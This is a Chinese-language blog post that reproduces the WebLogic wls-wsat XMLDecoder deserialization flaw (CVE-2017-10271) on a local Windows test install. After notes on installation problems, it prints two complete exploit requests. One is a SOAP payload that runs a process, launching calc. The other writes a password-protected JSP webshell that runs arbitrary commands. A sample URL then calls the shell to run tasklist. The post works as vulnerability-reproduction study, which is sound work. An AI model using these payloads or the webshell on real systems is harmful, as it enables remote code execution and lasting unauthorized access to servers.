Weblogic 小於10.3.6 'wls-wsat' XMLDecoder 反序列化漏洞(CVE-2017-10271)
阿新 • • 發佈:2018-11-15
之前本來複現過一次的,結果後來資料丟了,只好再來一遍。
沒找到在linux下命令列安裝的方法,於是直接在windows上安裝算了。
12.2.1.2.0下載:
windows環境,需以管理員身份執行,否則會出現:
以管理員身份執行:
最後啟動管理伺服器:
檢視網路埠:
然後exploit之後沒有成功。
https://www.exploit-db.com/exploits/43458/
可能是Java8的原因,然而切換Java版本比較困難。
最終終於找到修改Java Home的地方了,在user_projects\domains\base_domain\bin\setDomainEnv.cmd
然而執行weblogic的時候提示說不支援Java8以下的。
然後我把請求方到burp裡看了一下,修改成windows的payload,然後依然發現是404 Not Found。難道官方已經把這個版本中的受影響的元件刪除了?
10.3.6.0下載:
https://download.oracle.com/otn/nt/middleware/11g/wls/1036/wls1036_generic.jar
安裝的時候大概是這樣:
這次終於可以訪問了
/wls-wsat/CoordinatorPortType
:PoC:
https://www.exploit-db.com/exploits/43458/
POST /wls-wsat/CoordinatorPortType HTTP/1.1 Host: 127.0.0.1:7001 Connection: close Accept-Encoding: gzip, deflate Accept: */* User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36 Content-Type: text/xml;charset=UTF-8 Content-Length: 539 <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <object class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="1" > <void index="0"> <string>calc</string> </void> </array> <void method="start"/> </object> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
彈計算器:
寫入webshell(https://github.com/iBearcat/Oracle-WebLogic-CVE-2017-10271):
請求:
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
Content-Type: text/xml;charset=UTF-8
Content-Length: 920
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"><soapenv:Header><work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"><java><java version="1.4.0" class="java.beans.XMLDecoder"><object class="java.io.PrintWriter"> <string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/test.jsp</string><void method="println"><string><![CDATA[<% if("cqq".equals(request.getParameter("password"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("command")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
} %>]]></string></void><void method="close"/></object></java></java></work:WorkContext></soapenv:Header><soapenv:Body/></soapenv:Envelope>
然後可以通過http請求:
http://127.0.0.1:7001/bea_wls_internal/test.jsp?password=cqq&command=tasklist